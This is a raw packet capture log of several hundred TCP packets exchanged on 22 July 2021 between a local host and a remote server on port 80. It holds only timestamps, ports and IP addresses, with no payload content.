Jul 22, 2021 11:28:05.377593994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377598047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.377646923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377700090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.377713919 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.378053904 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.378817081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456410885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456453085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456579924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456594944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456624031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456659079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456707001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456712961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456751108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456789970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456804037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456828117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456851006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456866980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456902981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456924915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.456942081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.456979036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457025051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457067966 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457068920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457077026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457106113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457144022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457154989 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457181931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457217932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457254887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457283974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457293034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457319021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457340956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457382917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457420111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457428932 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457449913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457467079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457489014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457535982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457541943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457577944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457614899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457633972 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457653046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457694054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457717896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457730055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457768917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457806110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457822084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457853079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457895041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457897902 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.457931042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457968950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.457984924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458007097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458034992 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458044052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458081007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458097935 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458117962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458163977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458175898 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458242893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458285093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458321095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458322048 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458358049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458394051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458431005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458468914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458491087 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458507061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458522081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458532095 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458554029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458594084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458621979 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458631992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458669901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458689928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458705902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458743095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458772898 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458780050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458817005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458863020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458893061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458903074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458936930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.458940029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458977938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.458996058 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459014893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459050894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459069014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459089041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459158897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459161043 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459198952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459245920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459265947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459287882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459322929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459342003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459359884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459398031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459414959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459433079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459470034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459486961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459507942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459553957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459558964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459594965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459631920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459651947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459670067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459707022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459723949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459743977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459779978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459799051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459817886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459863901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459870100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.459904909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459940910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459978104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.459980965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460014105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460042000 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460051060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460089922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460105896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460127115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460174084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460177898 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460216045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460252047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460268974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460289001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460326910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460350037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460362911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460400105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460436106 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460437059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460484028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460491896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460525990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460561991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460601091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460608959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.460639000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.460664988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.461091042 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539419889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539463043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539501905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539537907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539555073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539576054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539609909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539613008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539660931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539702892 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539702892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539741993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539758921 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539779902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539819002 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539830923 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539855003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539892912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539905071 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.539930105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539975882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.539985895 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540018082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540055037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540093899 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540093899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540134907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540157080 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540172100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540209055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540222883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540246010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540292978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540292978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540334940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540395975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540412903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540455103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540501118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540508986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540544033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540580034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540591955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540617943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540656090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540677071 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540692091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540729046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540757895 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540767908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540815115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540832043 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540855885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540894032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540931940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540947914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.540968895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.540983915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541004896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541043043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541055918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541079998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541126013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541136026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541167021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541203976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541229963 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541240931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541279078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541291952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541313887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541352034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541368008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541388035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541435003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541435957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541476011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541512012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541528940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541551113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541579962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541589022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541593075 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541625977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541662931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541676044 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541701078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541747093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541771889 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541793108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541831017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541845083 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541867971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541904926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541925907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.541940928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541977882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.541996956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542012930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542058945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542090893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542100906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542136908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542150021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542176008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542213917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542227983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542258978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542295933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542311907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542334080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542370081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542382002 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542407036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542443991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542489052 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542490005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542531967 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542560101 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542568922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542607069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542635918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542644024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542680025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542697906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542717934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542756081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542768955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542802095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542844057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542855978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542881012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542918921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542932034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.542956114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.542992115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543004036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543030024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543066978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543078899 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543112993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543195009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543206930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543281078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543319941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543356895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543386936 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543392897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543440104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543457985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543482065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543518066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543539047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543555975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543593884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543605089 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543629885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543668032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543680906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.543704033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.543767929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.549432039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.550277948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.622970104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623452902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623516083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623543978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623558044 CEST	80	49720	94.228.114.197	192.168.2.3
